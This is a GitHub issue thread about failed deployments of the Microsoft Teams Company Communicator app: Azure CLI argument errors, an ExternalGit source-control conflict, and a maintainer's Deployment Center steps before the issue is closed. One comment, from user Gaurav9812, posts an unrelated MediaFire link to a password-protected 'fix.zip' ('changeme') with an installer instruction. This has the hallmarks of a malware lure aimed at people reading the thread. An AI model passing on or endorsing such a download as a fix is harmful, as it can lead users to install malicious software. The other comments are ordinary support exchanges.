### ISSUE TITLE
Failure to Deploy Error

### ISSUE THREAD

**Issue by HishamAlifiah** [OfficeDev/microsoft-teams-apps-company-communicator#1555]
![Untitled 3png](https://github.com/user-attachments/assets/c56941db-e058-4962-af25-b6e5ffb9bee0)

Deployment by Powershell commands keep giving error as above

of concern is this part here:
"
Creating Azure AD App: FYP1-QIU-July-2024-users...
ERROR: unrecognized arguments: --available-to-other-tenants True --oauth2-allow-implicit-flow False

Examples from AI knowledge base:
az ad app create --display-name mytestapp --optional-claims @manifest.json
Create an application with optional claims

az ad app create --display-name mytestapp --identifier-uris https://mytestapp.websites.net --app-roles @manifest.json
Create an application with a role

https://docs.microsoft.com/en-US/cli/azure/ad/app#az_ad_app_create
Read more about the command in reference docs
Waiting for app creation to finish...
Azure AD App: FYP1-QIU-July-2024-users is created.
Updating app secret...
ERROR: argument --id: expected one argument

Examples from AI knowledge base:
az ad app credential reset --id 00000000-0000-0000-0000-000000000000
append or overwrite an application's password or certificate credentials (autogenerated)

az ad app credential reset --id 00000000-0000-0000-0000-000000000000 --cert "@~/cert.pem"
Append a certificate to the application with the certificate file.

https://docs.microsoft.com/en-US/cli/azure/ad/app/credential#az_ad_app_credential_reset
Read more about the command in reference docs
Azure AD App: FYP1-QIU-July-2024-users registered successfully.
Failed to create or update User app in Azure Active Directory. Exiting..."

Since the instruction for deployment did not say anything about this error, I am in confusion with how to go about this.

Please help.

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HishamAlifiah** [comment]
> Hi @HishamAlifiah we recommend you to follow the manual deployment over powershell approach as there is existing issue script that is not compatible with Azure CLI version. In addition, good troubleshooting is possible with manual approach.

I tried that too and keeps reproducing the same error.

Also I tried the Template approach and keep getting this error

"There was a conflict. Conflict with existing ScmType: ExternalGit (Target: /subscriptions/60b00840-031c-42be-87be-c07cd7a4ed03/resourceGroups/CompanyCommunicatorRGJuly24/providers/Microsoft.Web/sites/FYP-QIU-July-2024/sourcecontrols/web)" with the Azure Portal side showing this sole pain point.

![Untitled   png](https://github.com/user-attachments/assets/2e212757-d526-456f-b451-9a01a45e3474)


Both approaches seem to get me to one pain point somehow just different pain points.

Please help.

**Comment by peddivyshnavi** [comment]
Hi @HishamAlifiah 

- To overcome the failed resources, Go to azure portal-->Go to resource group(Where the deployment has been done)-->Select prep-function(or failed resource) from list of resources-->Go to Deployment Center-->Click on Settings. Below is the screenshot for reference.

![image](https://github.com/user-attachments/assets/82b29809-e98b-4482-9f7d-c95c5b208bf3)

- If the resource is not pointing to intended repository and showing empty. Please connect to the external Git and point to the official repository(like above)

- Once the status turns to Success(active) in the logs section then good to proceed with remaining steps of deployment.
- Please do the same for other failed resource as well.
- After performing the above steps, don't attempt for re-deploy again.

**Comment by peddivyshnavi** [comment]
@HishamAlifiah 
Could you please update us on the status of the issue?

**Comment by peddivyshnavi** [comment]
@HishamAlifiah 
Could you please update us on the status of the issue?

**Comment by peddivyshnavi** [comment]
@HishamAlifiah 
Please let us know if you are still facing this issue and require assistance and we will be happy to discuss. If no further action is needed at the moment and no response is received, we will close out the issue in 2 business days.

**Comment by peddivyshnavi** [comment]
marking this ticket as closed
